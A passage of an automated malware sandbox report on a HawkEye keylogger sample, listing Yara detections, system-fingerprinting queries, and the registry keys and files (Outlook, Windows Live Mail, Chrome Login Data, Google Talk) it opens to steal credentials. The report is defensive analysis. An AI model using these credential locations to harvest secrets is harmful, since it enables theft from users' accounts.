                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00412BFC cpuid
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040F05A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                Stealing of Sensitive Information

                barindex
                Yara detected MailPassView
                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a7fa72.18.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.49edc72.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4965c92.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000000.306975405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.310652543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.306290437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.305733767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6720, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 580, type: MEMORYSTR
                Yara detected HawkEye Keylogger
                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.2829258.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6720, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Tries to steal Mail credentials (via file registry)
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a29c0d.17.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.15.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41ce65.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f9265.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4997e0d.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.380b065.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490fe2d.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.307280478.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6720, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5484, type: MEMORYSTR
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

                Remote Access Functionality

                barindex
                Yara detected HawkEye Keylogger
